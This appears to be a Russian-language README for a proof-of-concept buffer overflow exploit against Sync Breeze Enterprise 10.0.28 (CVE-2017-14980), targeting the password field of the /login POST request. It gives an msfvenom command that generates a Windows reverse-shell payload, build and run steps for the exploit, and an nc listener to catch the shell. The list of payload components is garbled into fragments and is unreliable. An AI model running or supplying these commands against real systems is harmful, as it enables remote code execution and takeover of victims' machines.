
Эксплойт переполнения буфера (Proof-of-concept) для Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Отправляет специально сформированную HTTP POST нагрузку для перезаписи EIP и выполнения пользовательского x86 шеллкода с целью произвольного выполнения кода.
Этот репозиторий содержит доказательство концепции эксплойта переполнения буфера (BOF) для Sync Breeze Enterprise версии 10.0.28, нацеленный на уязвимость, обозначенную как CVE-2017-14980.
Уязвимость существует из-за неправильной проверки ввода при обработке поля password в POST-запросе к конечной точке /login.
Злоумышленник может отправить чрезмерно длинное значение в этом поле, что перезаписывает EIP и позволяет выполнить произвольный код.
Этот эксплойт отправляет тщательно сформированную полезную нагрузку, состоящую из:
'A')password.gcc)\x83\x0C\x09\x10) и shellcode при необходимостиПример генерации shellcode с помощью msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
gcc exploit.c -o exploit
./exploit
nc -nlvp 4444